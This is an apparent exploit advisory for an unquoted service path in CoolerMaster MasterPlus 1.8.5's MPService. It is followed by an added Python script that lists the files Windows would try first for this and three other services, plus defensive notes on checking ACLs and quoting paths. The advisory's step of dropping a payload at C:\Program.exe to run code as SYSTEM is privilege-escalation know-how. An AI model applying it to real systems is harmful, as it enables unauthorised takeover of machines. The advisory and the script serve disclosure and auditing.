<pre><code># Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path<br /># Date: 11/17/2022<br /># Exploit Author: Damian Semon Jr (Blue Team Alpha)<br /># Version: 1.8.5<br /># Vendor Homepage: https://masterplus.coolermaster.com/<br /># Software Link: https://masterplus.coolermaster.com/<br /># Tested on: Windows 10 x64<br /><br /># Step to discover the unquoted service path:<br />wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """<br /><br />CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto<br /><br /># Info on the service:<br />C:\>sc qc MPService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MPService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : CoolerMaster MasterPlus Technology Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /> <br /> <br />#Exploit:<br />A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with SYSTEM privileges. Drop a payload named "Program.exe" in C:\ and restart the service or the computer to trigger it.<br />Ex: (C:\Program.exe)<br /><br /></code></pre>
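The four unquoted-service-path advisories on this page (MSExchangeADTopology, HKClipSvc, PsyFrameGrabberService and MPService) all rest on the same Windows behaviour: when the service control manager starts a service whose BINARY_PATH_NAME contains spaces but no quotes, CreateProcess tries each space-delimited prefix in turn, appending .exe where the prefix has no extension, and runs the first file that exists. The following is an added example written for this page (not taken from any of the advisories or from the vendors) that parses `sc qc` output, lists the candidate files in the order Windows tries them, and records whether the service is auto-start and runs as LocalSystem. The `sc qc` text is a constructed sample built from the MPService advisory above; the other three paths are the ones the advisories report.

```python
"""Listing the files Windows would try before an unquoted service binary.

Added example for this page; not from the advisories above or from the vendors.
"""
import re

# Constructed sample of `sc qc MPService` output, based on the advisory above.
SC_QC_SAMPLE = r"""
SERVICE_NAME: MPService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CoolerMaster MasterPlus Technology Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc <name>` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def hijack_candidates(binary_path):
    """Files CreateProcess would run instead of the real binary, in lookup order.

    A quoted path, or one without spaces, yields nothing. Arguments after the
    executable are ignored: the real binary is found before they are reached.
    """
    if binary_path.startswith('"') or " " not in binary_path:
        return []
    m = re.match(r"(?i)(.*?\.exe)(\s|$)", binary_path)
    command = m.group(1) if m else binary_path
    tokens = command.split(" ")
    candidates = []
    for i in range(1, len(tokens)):          # every prefix except the full command
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        # CreateProcess appends .exe only when the name carries no extension
        candidates.append(prefix if "." in last_component else prefix + ".exe")
    return candidates


def assess(fields):
    """Summarise one service; None when its path cannot be hijacked this way."""
    candidates = hijack_candidates(fields.get("BINARY_PATH_NAME", ""))
    if not candidates:
        return None
    return {
        "service": fields.get("SERVICE_NAME", "?"),
        "runs_as": fields.get("SERVICE_START_NAME", "?"),
        "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
        "candidates": candidates,
    }


if __name__ == "__main__":
    print(assess(parse_sc_qc(SC_QC_SAMPLE)))
    for path in (
        r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe",
        r"C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe",
        r"C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe",
    ):
        print(path, "->", hijack_candidates(path))
```

For all four services the first candidate is C:\Program.exe, and the second is C:\Program Files.exe or, for Exchange, C:\Program Files\Microsoft\Exchange.exe. Whether a finding is a real privilege escalation then depends only on the ACL of those parent directories: in a default installation a standard user can create neither C:\Program.exe nor files under C:\Program Files, so check each candidate's directory with `icacls` before rating the issue. The fix on the vendor side is to register the service with the path in quotes.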